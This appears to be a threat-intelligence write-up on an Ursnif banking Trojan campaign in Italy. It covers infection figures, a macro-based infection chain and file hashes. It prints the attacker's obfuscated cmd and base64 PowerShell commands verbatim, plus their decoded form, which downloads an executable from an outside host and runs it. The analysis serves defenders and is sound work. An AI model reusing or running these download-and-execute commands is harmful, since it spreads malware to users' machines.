Ursnif — attacks in Italy
Ursnif is a Banking Trojan malware designed to maintain system access and steal user credentials through keylogging functionality.
The campaign identified and analysed represents the second wave of Ursnif attacks in November (YER, root folder of the distribution system). We tracked 775 Italian systems compromised, representing 46% of the total:

Infections Italy and Worldwide
Our research and analysis operations enabled us to obtain further details regarding systems compromised by Ursnif malware. The following represents the distribution of infections globally. Particularly noteworthy is that Italy represents a significant target for the criminal group deploying Ursnif malware.

Distribution of infections in Italy highlighting the most affected provinces.

The following images show details of the Italian compromises: on one side, the Internet Service Providers whose customers account for the highest number of infected devices; on the other, the list of primary IP addresses of the compromised systems.


The Infection Process
The infection chain is now well-established: malicious emails carrying Office documents, in this case Word, either as attachments or as downloadable links. The malicious document contains a macro that, if enabled, executes a series of system commands that compromise the host.

Executed Commands
The Word document does not contain the malware itself but acts as a downloader: it handles the download and execution of the malware in three steps.
Step 1 (obfuscated cmd command):
cMd.EXE /c p^o^W^e^r^S^h^e^l^L^.^e^x^e^ ^-^e^c^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^u^A^G^k^A^b^g^B^h^A^H^M^A^d^Q^B^r^A^G^E^A^c^w^B^o^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^Z^A^E^U^A^U^g^A^v^A^H^A^A^Z^Q^B^s^A^G^k^A^b^Q^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^H^U^A^b^A^B^v^A^G^Y^A^M^g^A^u^A^H^c^A^b^w^B^z^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^3^A^D^g^A^M^w^A^2^A^D^A^A^M^Q^B^l^A^D^g^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^C^k^A^O^w^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^c^A^O^A^A^z^A^D^Y^A^M^A^A^x^A^G^U^A^O^A^A^u^A^G^U^A^e^A^B^l^A^C^c^A^O^w^A^g^A^E^U^A^e^A^B^p^A^H^Q^A
Step 2 (Powershell command):
cMd.EXE /c poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBuAGkAbgBhAHMAdQBrAGEAcwBoAC4AYwBvAG0ALwBZAEUAUgAvAHAAZQBsAGkAbQAuAHAAaABwAD8AbAA9AHUAbABvAGYAMgAuAHcAbwBzACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAA3ADgAMwA2ADAAMQBlADgALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADcAOAAzADYAMAAxAGUAOAAuAGUAeABlACcAOwAgAEUAeABpAHQA
Step 3 (Base64 command decoded; the Base64 is UTF-16LE text, as PowerShell -ec expects):
(New-Object System.Net.WebClient).DownloadFile("http://ninasukash.com/YER/pelim.php?l=ulof2.wos", $env:APPDATA + '\783601e8.exe');Start-Process $env:APPDATA'\783601e8.exe'; Exit
The URSNIF Malware
The extracted PowerShell command downloads the Ursnif malware from the site ninasukash[.]com. Our Cyber Threat Intelligence operations have identified this infrastructure as a persistent distribution vector for this Banking Trojan family. The download is performed by the portion:
DownloadFile("http://ninasukash.com/YER/pelim.php?l=ulof2.wos", $env:APPDATA + '\783601e8.exe');
and the file is then immediately executed by the portion:
Start-Process $env:APPDATA'\783601e8.exe'
| Info | Value |
|---|---|
| MD5 | ab33b0f6560c16133339182b8c5030ce |
| SHA1 | 261cb3e5595f4cca5a0c0a12006288e48a8f6d1e |
| SHA256 | 0ce4392261f6d8d0a2fa666b649860716527f41ea90de948fb03affed69a50ac |
| VirusTotal | VirusTotal Link |
Further technical details are available in the second part of this analysis. The infection chain observed—macro-enabled Office documents, obfuscated command execution, and multi-stage payload delivery—remains a persistent attack vector requiring endpoint detection and response capabilities to identify and contain Banking Trojan infections at scale.